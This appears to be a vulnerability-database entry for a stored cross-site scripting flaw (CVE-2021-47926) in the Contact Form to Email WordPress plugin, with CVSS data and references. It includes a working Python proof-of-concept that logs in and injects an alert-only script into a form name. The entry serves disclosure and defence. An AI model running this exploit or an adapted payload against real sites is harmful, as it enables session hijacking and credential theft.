CVE-2021-47926

Description

Contact Form to Email 1.3.24 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by creating forms with script tags in the form name field. Attackers can craft form names containing JavaScript code that executes when other logged-in users access the form management page, enabling session hijacking or credential theft.

CVSS Details

CVSS Score

6.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Contact Form to Email 1.3.24

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests # Target configuration target_url = "http://example.com/wp-admin/admin.php?page=cp_contact_form_to_email" login_url = "http://example.com/wp-login.php" # Attacker credentials (low privilege) username = "attacker" password = "password" # Start a session to maintain cookies session = requests.Session() # Step 1: Authenticate to WordPress login_data = { "log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": target_url } session.post(login_url, data=login_data) # Step 2: Prepare the XSS payload # Injecting script into the vulnerable form name field xss_payload = "<img src=x onerror=alert('XSS-CVE-2021-47926')>" # Step 3: Send exploit request data = { "cp_contact_form_to_email_name": xss_payload, "cp_contact_form_to_email_subject": "Test", "cp_contact_form_to_email_emailto": "[email protected]", "cp_contact_form_to_email_submit": "Save" } response = session.post(target_url, data=data) if response.status_code == 200: print("[+] Payload sent successfully.") print("[+] Check the admin form list page for execution.") else: print("[-] Failed to send payload.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2021-47926
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2021-47926
[3] CVE Details https://www.cvedetails.com/cve/CVE-2021-47926/
[4] VulDB https://vuldb.com/cve/CVE-2021-47926
[5] https://form2email.dwbooster.com/
[6] https://www.exploit-db.com/exploits/50524
[7] https://www.vulncheck.com/advisories/wordpress-contact-form-to-email-stored-xss

Raw JSON Data

JSON

{"cve": {"id": "CVE-2021-47926", "sourceIdentifier": "[email protected]", "published": "2026-05-10T13:16:28.573", "lastModified": "2026-05-12T14:24:15.210", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Contact Form to Email 1.3.24 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by creating forms with script tags in the form name field. Attackers can craft form names containing JavaScript code that executes when other logged-in users access the form management page, enabling session hijacking or credential theft."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://form2email.dwbooster.com/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/50524", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/wordpress-contact-form-to-email-stored-xss", "source": "[email protected]"}]}}